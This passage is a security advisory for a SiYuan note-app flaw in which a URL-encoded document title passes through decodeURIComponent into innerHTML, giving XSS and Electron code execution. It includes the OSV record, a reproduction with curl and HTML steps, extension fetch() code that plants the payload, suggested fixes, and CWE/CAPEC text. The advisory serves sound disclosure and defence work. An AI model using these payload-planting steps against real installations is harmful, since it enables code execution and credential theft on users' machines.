  2. Verify the kernel is up: sh curl -s http://127.0.0.1:6806/api/system/version # → {"code":0,"msg":"","data":"3.6.5"}
  3. Create at least one notebook (the file tree's "+" button) so lsNotebooks returns a usable id. Pin variables: sh API=http://127.0.0.1:6806 NOTEBOOK_ID=$(curl -s -X POST $API/api/notebook/lsNotebooks \ -H 'Content-Type: application/json' -d '{}' \ | python -c 'import sys,json; print(json.load(sys.stdin)["data"]["notebooks"][0]["id"])') echo "Using notebook: $NOTEBOOK_ID"

Step A — Browser-only validation of the chain (no SiYuan needed)

This proves the bug class on its own. Save as decode-chain.html, open in any Chromium-based browser:

<!doctype html>
<html><body>
<h2 id="status">Click "Simulate" — if status turns red, the chain works.</h2>
<span id="src" class="ariaLabel"
      aria-label="%3Cimg src=x onerror=&quot;document.getElementById('status').innerText='RESULT: payload fired — chain works'; document.getElementById('status').style.color='red';&quot;%3E"
      hidden></span>
<button onclick="
  let tip = document.getElementById('src').getAttribute('aria-label');
  console.log('after getAttribute:', JSON.stringify(tip));
  try { tip = decodeURIComponent(tip); } catch(e){}
  console.log('after decodeURIComponent:', JSON.stringify(tip));
  document.getElementById('out').innerHTML = tip;
">Simulate SiYuan tooltip</button>
<div id="out" style="border:2px solid red; padding:1em; min-height:3em; margin-top:1em;"></div>
</body></html>

Click the button. The <h2 id="status"> flips to red with "RESULT: payload fired — chain works", and the <div id="out"> contains a fully-rendered <img> element (not text). Confirms the chain decodes URL-escapes between getAttribute and innerHTML, producing real tag-open characters.

Step B — Plant the payload in SiYuan

DOC_ID=$(curl -s -X POST $API/api/filetree/createDocWithMd \
  -H 'Content-Type: application/json' \
  -d "{\"notebook\":\"$NOTEBOOK_ID\",\"path\":\"/tooltip-xss-poc-$$\",\"markdown\":\"trigger me — open the search panel, type 'trigger', and hover this result\"}" \
  | python -c 'import sys,json; print(json.load(sys.stdin)["data"])')
echo "DOC: $DOC_ID"

curl -s -X POST $API/api/filetree/renameDocByID \
  -H 'Content-Type: application/json' \
  --data-binary @- <<EOF
{"id":"$DOC_ID","title":"%3Cimg src=x onerror=\"alert('SiYuan tooltip-XSS PoC')\"%3E"}
EOF

Verify the in-memory title round-trips:

curl -s -X POST $API/api/block/getDocInfo \
  -H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}" \
  | python -c 'import sys,json; print(json.load(sys.stdin)["data"]["ial"]["title"])'
# Expected:
# %3Cimg src=x onerror="alert('SiYuan tooltip-XSS PoC')"%3E

Step C — Trigger inside SiYuan

In the SiYuan desktop client: 1. Open the search panel (Ctrl+P / ⌘+P). 2. Type trigger. 3. The result list renders the doc with aria-label="${escapeAriaLabel(title)}". The DOM attribute now contains %3Cimg src=x onerror="alert('SiYuan tooltip-XSS PoC')"%3E (URL-escapes survived; &quot; came from escapeAriaLabel and was decoded by the attribute parser to "). 4. Hover the result row. popover.ts:33 reads the attribute, popover.ts:144 calls decodeURIComponent (decoding %3C/%27/%3E to literal </'/>), tooltip.ts:41 writes innerHTML — HTML parser creates a real <img> element, onerror fires. 5. alert('SiYuan tooltip-XSS PoC') pops.

Step D — .sy.zip reproducer for upstream review

For maintainers who want a single-click reproducer:

ZIP_PATH=$(curl -s -X POST $API/api/export/exportSY \
  -H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}" \
  | python -c 'import sys,json; print(json.load(sys.stdin)["data"]["zip"])')
# The kernel re-encodes % in the URL, so it's simpler to grab from disk:
SRC=$(ls -1t "$HOME/SiYuanWorkspace/temp/export"/*.sy.zip | head -1)
cp "$SRC" "$HOME/Desktop/tooltip-xss-poc.sy.zip"

Maintainer reproduces by importing via right-click a notebook → ImportSiYuan .sy.zip → searching trigger → hovering the result. The Lute serialization stores the title in the .sy file with %XX preserved literally and " HTML-entity-encoded — the IAL parser decodes the entities on load, leaving the URL escapes intact, which then feeds the decodeURIComponent-based bypass.

Step E — Browser-extension attack vector (the realistic remote path)

A malicious or compromised installed browser extension's content/background script runs with chrome-extension://<id> Origin, allowlisted by session.go:277. The extension can run Step B's curl chain via fetch() without any SiYuan UI interaction beyond keeping the kernel running:

(async () => {
  const api = (path, body) => fetch('http://127.0.0.1:6806' + path, {
    method: 'POST', headers: {'Content-Type': 'application/json'},
    body: JSON.stringify(body)
  }).then(r => r.json());
  const nb = await api('/api/notebook/lsNotebooks', {});
  const id = (await api('/api/filetree/createDocWithMd', {
    notebook: nb.data.notebooks[0].id,
    path: '/x' + Date.now(),
    markdown: 'trigger'
  })).data;
  await api('/api/filetree/renameDocByID', {
    id,
    title: `%3Cimg src=x onerror="alert('SiYuan tooltip-XSS PoC')"%3E`
  });
})();

A page from https://attacker.com is rejected — IsLocalOrigin only matches localhost/loopback. Realistic remote vectors: browser extensions, localhost-served webpages, shared .sy.zip imports, sync replication from a co-author's compromised device.

Cleanup

DOC_ID=$(curl -s -X POST $API/api/filetree/searchDocs \
  -H 'Content-Type: application/json' -d '{"k":"trigger me"}' \
  | python -c 'import sys,json; r=json.load(sys.stdin)["data"]; print(r[0]["id"] if r else "")')
[ -n "$DOC_ID" ] && curl -s -X POST $API/api/filetree/removeDocByID \
  -H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}"

Impact

  • RCE on the victim's desktop, triggered by hovering a search result (or any other class="ariaLabel" element rendering attacker-controlled metadata).
  • Doc titles are the most commonly-shared field — recipients of .sy.zip, Bazaar templates, and sync peers all import the malicious title automatically; the URL encoding survives every transport.
  • Same post-RCE consequences as Advisory 1: full filesystem read (incl. ~/.ssh/, ~/.aws/credentials, workspace conf/conf.json), persistence, cloud-account pivot.
  • Multiple alternative trigger surfaces beyond search results: AV column names + descriptions, AV select-cell options, file-tree tooltips — any element with class="ariaLabel" and aria-label="${escapeAriaLabel(...)}" reaches the same popover.ts → tooltip.ts chain.
  • CVE-2026-34585 fix is incomplete. The encoder-side hardening assumed exactly one HTML decode between encoder and DOM. It did not account for decodeURIComponent being applied to the consumer-side attribute value, which converts URL-escapes that the encoder ignored into literal < characters that initiate tag parsing. A consumer-side fix (textContent, or DOMPurify.sanitize on the rich-text path; and removing the unconditional decodeURIComponent) is required.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260421031503-96dfe0bea474"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44588"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-1188",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T19:08:30Z",
    "nvd_published_at": "2026-05-14T19:16:37Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe tooltip mouseover handler in `app/src/block/popover.ts` reads `aria-label` via `getAttribute` and passes it through `decodeURIComponent` before assigning to `messageElement.innerHTML` in `app/src/dialog/tooltip.ts:41`. The encoder used at the producer side, `escapeAriaLabel` in `app/src/util/escape.ts:19-25`, only handles HTML special characters (`\"`, `\u0027`, `\u003c`, literal `\u0026lt;`) \u2014 it leaves `%XX` URL-escapes untouched. So a doc title containing `%3Cimg src=x onerror=...%3E` round-trips through `escapeAriaLabel` and the HTML attribute layer unmodified. Then `decodeURIComponent` on the consumer side converts `%3C` to a literal `\u003c` character (a real `\u003c`, NOT a character reference). When that string is assigned to `innerHTML`, the HTML5 tokenizer enters TagOpenState on the literal `\u003c`, parses the `\u003cimg\u003e` element, and the `onerror` handler fires.\n\nBecause the renderer runs with `nodeIntegration: true, contextIsolation: false, webSecurity: false` (`app/electron/main.js:407-411`), `require(\u0027child_process\u0027)` is reachable from the injected handler, escalating to arbitrary code execution.\n\nDoc titles, AV column names + descriptions, AV select options, file-tree tooltips all reach this sink because they\u0027re rendered into `class=\"ariaLabel\"` elements with `aria-label=\"${escapeAriaLabel(...)}\"`. Doc title is the easiest plant \u2014 any user with create/rename access lands the payload, and the file survives `.sy.zip` round-trip without modification.\n\n## Why a \"double HTML-decode\" framing is wrong\n\nA na\u00efve reading of the chain might suggest that `\u0026amp;lt;` (the encoder output) decodes once at attribute-parse time to `\u0026lt;`, then a second time at `innerHTML` time to `\u003c` \u2014 yielding a tag. **That\u0027s incorrect** and confirmed false by direct browser testing. Per the HTML5 spec, character references in DataState produce CHARACTER tokens (text), not TagOpenState transitions: the `\u003c` resulting from a `\u0026lt;` reference is text data, never a tag-open delimiter. So the HTML-entity-only payload renders as visible literal text, not as a tag.\n\nThe actual bypass relies on `decodeURIComponent` producing a **literal** `\u003c` (not a character reference) before `innerHTML` parses it. Literal `\u003c` characters in the input stream DO trigger TagOpenState. URL encoding is the right vehicle because the encoder ignores `%XX` while the consumer chain decodes it.\n\n## Details\n\n**Encoder.** `app/src/util/escape.ts:19-25`:\n```ts\nexport const escapeAriaLabel = (html: string) =\u003e {\n    if (!html) { return html; }\n    return html.replace(/\"/g, \"\u0026quot;\").replace(/\u0027/g, \"\u0026apos;\")\n        .replace(/\u003c/g, \"\u0026amp;lt;\").replace(/\u0026lt;/g, \"\u0026amp;lt;\");\n};\n```\nThe four replacements only cover HTML special chars. `%XX` URL escapes are not touched.\n\n**Source \u2014 search-result rendering.** `app/src/search/util.ts:1406`:\n```ts\n\u003cspan class=\"b3-list-item__text ariaLabel\" ... aria-label=\"${escapeAriaLabel(title)}\"\u003e${escapeGreat(title)}\u003c/span\u003e\n```\nSame pattern at `:1448`, `protyle/render/av/blockAttr.ts:205`, `protyle/render/av/col.ts:134`, `protyle/render/av/select.ts:36`, `search/unRef.ts:113`. The `title` is built from `getNotebookName(item.box) + getDisplayName(item.hPath, false)` (line 1398). The `hPath` returned by `/api/search/fullTextSearchBlock` carries the user-set doc title verbatim \u2014 `%XX` URL-escapes pass through, only HTML special chars are entity-encoded by the kernel.\n\n**Consumer.** `app/src/block/popover.ts:33,144`:\n```ts\nlet tip = aElement.getAttribute(\"aria-label\") || \"\";       // literal stored attribute value\n// ... branch logic that doesn\u0027t apply to plain search results ...\nshowTooltip(decodeURIComponent(tip), aElement, ...);       // \u2190 decodes %XX into raw chars\n```\n`decodeURIComponent` is presumably present to handle URL-encoded asset paths in some hyperlink tooltips, but it\u0027s applied unconditionally to every aria-label-sourced tip \u2014 that\u0027s what enables this bypass.\n\n**Sink.** `app/src/dialog/tooltip.ts:41`:\n```ts\nmessageElement.innerHTML = message;     // \u2190 HTML parser sees the now-decoded raw `\u003c` and starts parsing tags\n```\n\n**Decode-chain trace** for in-memory title `%3Cimg src=x onerror=\"alert(\u0027SiYuan\u0027)\"%3E` (URL-encoded `\u003c` `\u003e` `\u0027`, literal `\"`):\n\n| step | result |\n|------|--------|\n| in-memory title | `%3Cimg src=x onerror=\"alert(\u0027SiYuan\u0027)\"%3E` |\n| `escapeAriaLabel` writes (only `\"` and `\u0027` get encoded \u2014 neither appears here as raw chars when `\u0027` is `%27`) | `%3Cimg src=x onerror=\u0026quot;alert(%27SiYuan%27)\u0026quot;%3E` |\n| HTML attribute set: `aria-label=\"...\"` ; browser one-decodes named entities when storing | in-DOM value = `%3Cimg src=x onerror=\"alert(%27SiYuan%27)\"%3E` |\n| `getAttribute(\"aria-label\")` | `%3Cimg src=x onerror=\"alert(%27SiYuan%27)\"%3E` (verbatim) |\n| `decodeURIComponent(tip)` | **`\u003cimg src=x onerror=\"alert(\u0027SiYuan\u0027)\"\u003e`** (real `\u003c` `\u0027` `\u003e` chars) |\n| `messageElement.innerHTML = \u2026` | HTML parser tokenizes raw `\u003cimg\u003e`, creates element, fails to load `src=x`, fires `onerror` \u2192 JS runs |\n\n**Renderer + reachability.** Renderer posture and auto-admin gates same as the AV-name advisory (Advisory 1): `nodeIntegration:true, contextIsolation:false, webSecurity:false` at `app/electron/main.js:407-411`; empty-`AccessAuthCode` local auto-admin at `kernel/model/session.go:261-287`; `chrome-extension://` Origin allowlist at `session.go:277`.\n\n## Suggested fix\n\n1. **Primary \u2014 `app/src/dialog/tooltip.ts:41`**: replace\n   ```ts\n   messageElement.innerHTML = message;\n   ```\n   with\n   ```ts\n   messageElement.textContent = message;\n   ```\n   For tooltips that legitimately need markup (memo rendering, hyperlink preview cards), introduce an explicit `{html: true}` flag on `showTooltip(...)` and route the message through `DOMPurify.sanitize(message)` before assigning to `innerHTML`.\n\n2. **Drop `decodeURIComponent` at `popover.ts:144`** for the generic aria-label path. Apply it only on the few callers that intentionally pass URL-encoded asset paths (e.g. the local-asset hyperlink preview branch already inside the function), and apply it inside `try`/`catch` with a clear scope. Aria-label content is not URL-encoded by design; decoding it is a footgun that converts otherwise-safe attributes into pre-parsed HTML.\n\n3. **Consolidate the four escape helpers** in `app/src/util/escape.ts` (`escapeHtml`, `escapeAttr`, `escapeAriaLabel`, `escapeGreat`) into one `Lute.EscapeHTMLStr`-equivalent that escapes `\u0026`, `\u003c`, `\u003e`, `\"`, `\u0027`. Context-specific encoders without compile-time enforcement keep producing bug-class variants.\n\n4. **(Defense-in-depth)** Switch the main BrowserWindow to `contextIsolation: true` with a preload bridge \u2014 caps every future renderer XSS at \"DOM only,\" not RCE.\n\n---\n\n## Reproduction (copy-paste-ready)\n\nTested on Windows with SiYuan v3.6.5 (kernel + Electron) and Microsoft Edge as the offline parser-validation engine. Linux/macOS users substitute `py` with `python3` and use any modern Chromium-based browser (Edge/Chrome/Brave) for the standalone validation step.\n\n### Prereqs\n\n1. **Install SiYuan v3.6.5** from https://github.com/siyuan-note/siyuan/releases and launch once. **Do not set an `AccessAuthCode`** (default).\n2. Verify the kernel is up:\n   ```sh\n   curl -s http://127.0.0.1:6806/api/system/version\n   # \u2192 {\"code\":0,\"msg\":\"\",\"data\":\"3.6.5\"}\n   ```\n3. Create at least one notebook (the file tree\u0027s \"+\" button) so `lsNotebooks` returns a usable id. Pin variables:\n   ```sh\n   API=http://127.0.0.1:6806\n   NOTEBOOK_ID=$(curl -s -X POST $API/api/notebook/lsNotebooks \\\n     -H \u0027Content-Type: application/json\u0027 -d \u0027{}\u0027 \\\n     | python -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"][\"notebooks\"][0][\"id\"])\u0027)\n   echo \"Using notebook: $NOTEBOOK_ID\"\n   ```\n\n### Step A \u2014 Browser-only validation of the chain (no SiYuan needed)\n\nThis proves the bug class on its own. Save as `decode-chain.html`, open in any Chromium-based browser:\n\n```html\n\u003c!doctype html\u003e\n\u003chtml\u003e\u003cbody\u003e\n\u003ch2 id=\"status\"\u003eClick \"Simulate\" \u2014 if status turns red, the chain works.\u003c/h2\u003e\n\u003cspan id=\"src\" class=\"ariaLabel\"\n      aria-label=\"%3Cimg src=x onerror=\u0026quot;document.getElementById(\u0027status\u0027).innerText=\u0027RESULT: payload fired \u2014 chain works\u0027; document.getElementById(\u0027status\u0027).style.color=\u0027red\u0027;\u0026quot;%3E\"\n      hidden\u003e\u003c/span\u003e\n\u003cbutton onclick=\"\n  let tip = document.getElementById(\u0027src\u0027).getAttribute(\u0027aria-label\u0027);\n  console.log(\u0027after getAttribute:\u0027, JSON.stringify(tip));\n  try { tip = decodeURIComponent(tip); } catch(e){}\n  console.log(\u0027after decodeURIComponent:\u0027, JSON.stringify(tip));\n  document.getElementById(\u0027out\u0027).innerHTML = tip;\n\"\u003eSimulate SiYuan tooltip\u003c/button\u003e\n\u003cdiv id=\"out\" style=\"border:2px solid red; padding:1em; min-height:3em; margin-top:1em;\"\u003e\u003c/div\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nClick the button. The `\u003ch2 id=\"status\"\u003e` flips to red with \"RESULT: payload fired \u2014 chain works\", and the `\u003cdiv id=\"out\"\u003e` contains a fully-rendered `\u003cimg\u003e` element (not text). Confirms the chain decodes URL-escapes between `getAttribute` and `innerHTML`, producing real tag-open characters.\n\n### Step B \u2014 Plant the payload in SiYuan\n\n```sh\nDOC_ID=$(curl -s -X POST $API/api/filetree/createDocWithMd \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \"{\\\"notebook\\\":\\\"$NOTEBOOK_ID\\\",\\\"path\\\":\\\"/tooltip-xss-poc-$$\\\",\\\"markdown\\\":\\\"trigger me \u2014 open the search panel, type \u0027trigger\u0027, and hover this result\\\"}\" \\\n  | python -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"])\u0027)\necho \"DOC: $DOC_ID\"\n\ncurl -s -X POST $API/api/filetree/renameDocByID \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data-binary @- \u003c\u003cEOF\n{\"id\":\"$DOC_ID\",\"title\":\"%3Cimg src=x onerror=\\\"alert(\u0027SiYuan tooltip-XSS PoC\u0027)\\\"%3E\"}\nEOF\n```\nVerify the in-memory title round-trips:\n```sh\ncurl -s -X POST $API/api/block/getDocInfo \\\n  -H \u0027Content-Type: application/json\u0027 -d \"{\\\"id\\\":\\\"$DOC_ID\\\"}\" \\\n  | python -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"][\"ial\"][\"title\"])\u0027\n# Expected:\n# %3Cimg src=x onerror=\"alert(\u0027SiYuan tooltip-XSS PoC\u0027)\"%3E\n```\n\n### Step C \u2014 Trigger inside SiYuan\n\nIn the SiYuan desktop client:\n1. Open the search panel (`Ctrl+P` / `\u2318+P`).\n2. Type `trigger`.\n3. The result list renders the doc with `aria-label=\"${escapeAriaLabel(title)}\"`. The DOM attribute now contains `%3Cimg src=x onerror=\"alert(\u0027SiYuan tooltip-XSS PoC\u0027)\"%3E` (URL-escapes survived; `\u0026quot;` came from escapeAriaLabel and was decoded by the attribute parser to `\"`).\n4. **Hover the result row.** `popover.ts:33` reads the attribute, `popover.ts:144` calls `decodeURIComponent` (decoding `%3C`/`%27`/`%3E` to literal `\u003c`/`\u0027`/`\u003e`), `tooltip.ts:41` writes `innerHTML` \u2014 HTML parser creates a real `\u003cimg\u003e` element, `onerror` fires.\n5. **`alert(\u0027SiYuan tooltip-XSS PoC\u0027)` pops.**\n\n### Step D \u2014 `.sy.zip` reproducer for upstream review\n\nFor maintainers who want a single-click reproducer:\n```sh\nZIP_PATH=$(curl -s -X POST $API/api/export/exportSY \\\n  -H \u0027Content-Type: application/json\u0027 -d \"{\\\"id\\\":\\\"$DOC_ID\\\"}\" \\\n  | python -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"][\"zip\"])\u0027)\n# The kernel re-encodes % in the URL, so it\u0027s simpler to grab from disk:\nSRC=$(ls -1t \"$HOME/SiYuanWorkspace/temp/export\"/*.sy.zip | head -1)\ncp \"$SRC\" \"$HOME/Desktop/tooltip-xss-poc.sy.zip\"\n```\nMaintainer reproduces by importing via right-click a notebook \u2192 **Import** \u2192 **SiYuan `.sy.zip`** \u2192 searching `trigger` \u2192 hovering the result. The Lute serialization stores the title in the `.sy` file with `%XX` preserved literally and `\"` HTML-entity-encoded \u2014 the IAL parser decodes the entities on load, leaving the URL escapes intact, which then feeds the `decodeURIComponent`-based bypass.\n\n### Step E \u2014 Browser-extension attack vector (the realistic remote path)\n\nA malicious or compromised installed browser extension\u0027s content/background script runs with `chrome-extension://\u003cid\u003e` Origin, allowlisted by `session.go:277`. The extension can run Step B\u0027s curl chain via `fetch()` without any SiYuan UI interaction beyond keeping the kernel running:\n```js\n(async () =\u003e {\n  const api = (path, body) =\u003e fetch(\u0027http://127.0.0.1:6806\u0027 + path, {\n    method: \u0027POST\u0027, headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n    body: JSON.stringify(body)\n  }).then(r =\u003e r.json());\n  const nb = await api(\u0027/api/notebook/lsNotebooks\u0027, {});\n  const id = (await api(\u0027/api/filetree/createDocWithMd\u0027, {\n    notebook: nb.data.notebooks[0].id,\n    path: \u0027/x\u0027 + Date.now(),\n    markdown: \u0027trigger\u0027\n  })).data;\n  await api(\u0027/api/filetree/renameDocByID\u0027, {\n    id,\n    title: `%3Cimg src=x onerror=\"alert(\u0027SiYuan tooltip-XSS PoC\u0027)\"%3E`\n  });\n})();\n```\nA page from `https://attacker.com` is rejected \u2014 `IsLocalOrigin` only matches localhost/loopback. Realistic remote vectors: **browser extensions**, **localhost-served webpages**, **shared `.sy.zip` imports**, **sync replication from a co-author\u0027s compromised device**.\n\n### Cleanup\n\n```sh\nDOC_ID=$(curl -s -X POST $API/api/filetree/searchDocs \\\n  -H \u0027Content-Type: application/json\u0027 -d \u0027{\"k\":\"trigger me\"}\u0027 \\\n  | python -c \u0027import sys,json; r=json.load(sys.stdin)[\"data\"]; print(r[0][\"id\"] if r else \"\")\u0027)\n[ -n \"$DOC_ID\" ] \u0026\u0026 curl -s -X POST $API/api/filetree/removeDocByID \\\n  -H \u0027Content-Type: application/json\u0027 -d \"{\\\"id\\\":\\\"$DOC_ID\\\"}\"\n```\n\n## Impact\n\n- **RCE on the victim\u0027s desktop**, triggered by hovering a search result (or any other `class=\"ariaLabel\"` element rendering attacker-controlled metadata).\n- **Doc titles are the most commonly-shared field** \u2014 recipients of `.sy.zip`, Bazaar templates, and sync peers all import the malicious title automatically; the URL encoding survives every transport.\n- Same post-RCE consequences as Advisory 1: full filesystem read (incl. `~/.ssh/`, `~/.aws/credentials`, workspace `conf/conf.json`), persistence, cloud-account pivot.\n- **Multiple alternative trigger surfaces** beyond search results: AV column names + descriptions, AV select-cell options, file-tree tooltips \u2014 any element with `class=\"ariaLabel\"` and `aria-label=\"${escapeAriaLabel(...)}\"` reaches the same `popover.ts \u2192 tooltip.ts` chain.\n- **CVE-2026-34585 fix is incomplete.** The encoder-side hardening assumed exactly one HTML decode between encoder and DOM. It did not account for `decodeURIComponent` being applied to the consumer-side attribute value, which converts URL-escapes that the encoder ignored into literal `\u003c` characters that initiate tag parsing. A consumer-side fix (`textContent`, or `DOMPurify.sanitize` on the rich-text path; and removing the unconditional `decodeURIComponent`) is required.",
  "id": "GHSA-25rp-h46x-2hjm",
  "modified": "2026-06-08T20:11:29Z",
  "published": "2026-05-08T19:08:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-25rp-h46x-2hjm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44588"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SiYuan: Electron Renderer RCE via decodeURIComponent-driven tooltip XSS in aria-label sink (incomplete fix for CVE-2026-34585)"
}

Mitigation MIT-4.3
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.
  • Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability.
Mitigation MIT-27
Architecture and Design

Strategy: Parameterization

  • If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
  • For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection.
Mitigation
Architecture and Design Implementation

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

Mitigation
Architecture and Design

In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input.

Mitigation
Architecture and Design

Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20).

Mitigation
Requirements

Fully specify which encodings are required by components that will be communicating with each other.

Mitigation
Implementation

When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so.

CAPEC-104: Cross Zone Scripting

An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.

CAPEC-73: User-Controlled Filename

An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.

CAPEC-81: Web Server Logs Tampering

Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.

CAPEC-85: AJAX Footprinting

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.